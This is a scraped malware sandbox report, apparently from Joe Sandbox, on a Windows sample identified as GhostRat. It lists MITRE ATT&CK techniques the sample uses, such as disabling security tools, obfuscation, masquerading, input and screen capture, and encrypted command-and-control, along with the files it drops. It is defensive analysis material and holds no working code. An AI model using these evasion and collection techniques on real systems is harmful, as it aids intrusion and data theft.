Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
Tactics:	Defense Evasion
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Deletion, File: File Metadata, File: File Modification, Firewall: Firewall Rule Modification, Network Traffic: Network Traffic Content, Process: OS API Execution, Process: Process Creation, Scheduled Job: Scheduled Job Modification, User Account: User Account Authentication, User Account: User Account Deletion, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, Google Workspace, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Uulw5M1DfU.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GhostRat

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Bilite\Axialis\IiViS

C:\Users\Public\Bilite\Axialis\Update.dll

C:\Users\Public\Bilite\Axialis\Update.exe

C:\Users\Public\Bilite\Axialis\ksqfwzmc.png

C:\Users\Public\Bilite\ldplayer9_ld_6000_ld.exe

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\PolicyManagement.xml

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bqzi4iyg.ehu.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fdetx00k.jdm.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ktysmd5v.a2x.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mqrb0oyd.o1m.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qnegupyr.bqi.ps1

Windows Analysis Report
Uulw5M1DfU.exe

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.
Tactics:	Impact
Data Sources:	Cloud Storage: Cloud Storage Modification, Command: Command Execution, File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre